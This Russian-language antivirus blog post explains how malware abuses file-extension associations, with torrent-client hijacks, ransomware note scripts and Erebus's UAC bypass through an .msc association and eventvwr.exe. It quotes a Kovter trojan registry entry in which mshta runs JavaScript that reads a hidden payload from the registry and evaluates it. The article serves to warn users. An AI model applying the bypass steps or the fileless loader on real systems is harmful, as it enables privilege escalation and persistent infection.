-
добавить в избранное
О расширениях – еще шире
18 сентября 2017
В выпуске «Три буквы после точки» мы рассказывали о том, как мошенники используют расширения файлов для обмана пользователей. Но в нем мы описали далеко не все возможности, которые расширения дают злоумышленникам.
Как мы уже упоминали, расширение ассоциируется операционной системой с определенными действиями, которые будут выполняться, если пользователь кликнет по файлу. К примеру, если это файл с расширением png, то, скорее всего, у вас запустится программа для просмотра или редактирования графических файлов. А что будет, если вы кликнете, скажем, по файлу с расширением .torrent?
Program.MediaGet устанавливает себя в качестве торрент-клиента по умолчанию, изменяя ассоциации .torrent файлов в реестре.
Program.Zona проверяет настройки ассоциаций с файлами .torrent и, в случае, если Zona не является программой по умолчанию для открытия торрент-файлов, предлагает ассоциировать себя с ними.
То есть, кликнув по ссылке, вы запустите вредоносную программу. Причем, скорее всего, еще и подтвердите запуск приложения, думая, что запускается торрент-клиент.
Система контроля запуска Windows, конечно, покажет, что запускается на самом деле, но, используя расширения, мошенники могут обойти и ее.
Метод обхода UAC заключается в следующем.
- Erebus копирует себя в системную папку как файл со случайным именем и затем вносит изменения в реестр Windows с целью подмены ассоциации для файлового расширения .msc и исполнения свежесозданного файла со случайным именем.
- Далее Erebus запускает файл eventvwr.exe (Просмотр событий), который автоматически открывает файл eventvwr.msc.
- Поскольку msc-файл больше не связан с mmc.exe (Консоль управления), то eventvwr.exe запустит файл вымогателя. Просмотр событий работает в режиме с повышенными правами, поэтому исполняемый файл будет иметь те же привилегии, что позволит обойти UAC.
https://twitter.com/malwrhunterteam/status/828957753121112064
Здесь используется тот факт, что ряд системных программ загружается сразу с повышенными правами, и вредоносные файлы запускаются вместо них либо в виде их расширений.
Как происходит ассоциация? Довольно просто. Вот, например, бестелесный Trojan.Kovter.297 регистрирует для себя файлы с нужным расширением и использует их как переключатели (триггеры) для своего запуска.
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"
Самое, пожалуй, безобидное, что вытворяют вирусописатели с расширениями, – это ассоциации созданных вредоносной программой файлов для уведомления жертв о необходимости выкупа.
Trojan.Encoder.12950 размещает в системе скрипт, который будет выводить сообщения с требованиями, и прописывает его в ассоциации для расширения *.dcry.
Антивирусная правДА! рекомендует
- Система контроля запуска Windows отображает запросы на запуск любых приложений. Поэтому не забывайте держать ее включенной.
- Внимательно читайте сообщения системы контроля запуска, чтобы понимать, какой именно файл пытается запуститься.
- Используйте антивирус. Только он может отследить все пакости, задуманные злоумышленниками.
|
Оцените выпуск Чтобы проголосовать зайдите в аккаунт на сайте или создайте его, если аккаунта еще нет.
|
Сделайте репост
|
![[ВКонтакте]](http://st.drweb.com/static/new-www/social/no_radius/vkontakte.png)
![[Twitter]](http://st.drweb.com/static/new-www/social/no_radius/twitter.png)
Необходимо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.
Нам важно ваше мнение
Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.
Комментарии пользователей
forrus
22:17:48 2018-12-18
Денисенко Павел Андреевич
23:08:02 2018-08-02
Неуёмный Обыватель
00:55:52 2018-06-26
vasvet
19:37:49 2018-04-04
globys
18:39:19 2017-09-20
В...а
21:05:07 2017-09-19
НинаК
19:51:44 2017-09-19
Serjik
17:14:48 2017-09-19
sapfira
13:45:21 2017-09-19
О...ч
06:04:49 2017-09-19
Хотя, вроде всё настроено и работает, но угрозы ходят рядом, а юзеры их просто "за шкирку" тащят в компы.
"Вбыв-бы"
Lia00
00:13:43 2017-09-19
razgen
23:20:19 2017-09-18
Родриго
22:56:25 2017-09-18
Littlefish
22:40:35 2017-09-18
Littlefish
22:22:42 2017-09-18
Littlefish
22:15:02 2017-09-18
Marsn77
21:57:10 2017-09-18
В...а
21:55:42 2017-09-18
kva-kva
20:49:31 2017-09-18
mk.insta
20:29:44 2017-09-18
Dvakota
20:16:20 2017-09-18
tigra
19:26:06 2017-09-18
Шалтай Александр Болтай
18:28:16 2017-09-18
vinnetou
16:51:12 2017-09-18
Tom
16:13:47 2017-09-18
Марина
15:44:07 2017-09-18
DrKV
15:03:32 2017-09-18
P.S. Ключевое слово - и_c_п_о_л_ь_з_у_й_т_е!
Brem
14:16:58 2017-09-18
Вячeслaв
12:55:44 2017-09-18
Пaвeл
12:45:07 2017-09-18
Mr.Magnium
11:43:23 2017-09-18
Геральт
11:23:01 2017-09-18
SGES
11:06:56 2017-09-18
Alexander
10:46:22 2017-09-18
Спасибо за статью, привлекли внимание и к этой стороне обеспечения антивирусной защиты.
user
10:17:22 2017-09-18
Роза
09:44:38 2017-09-18
Влад
09:17:37 2017-09-18
Влад
09:17:29 2017-09-18
Natalya_2017
09:11:18 2017-09-18
a13x
08:54:33 2017-09-18
eaglebuk
08:32:50 2017-09-18
@tigra, Powerline-адаптеры созданы не для этого, но использовать можно и для разноса заразы)
dyadya_Sasha
08:08:40 2017-09-18
maestro431
07:55:14 2017-09-18
razgen
07:23:50 2017-09-18
tigra
07:08:04 2017-09-18
tigra
07:05:39 2017-09-18
Любитель пляжного футбола
06:57:59 2017-09-18
Morpheus
04:49:42 2017-09-18
AxooxA
03:48:07 2017-09-18
Sasha50
03:23:54 2017-09-18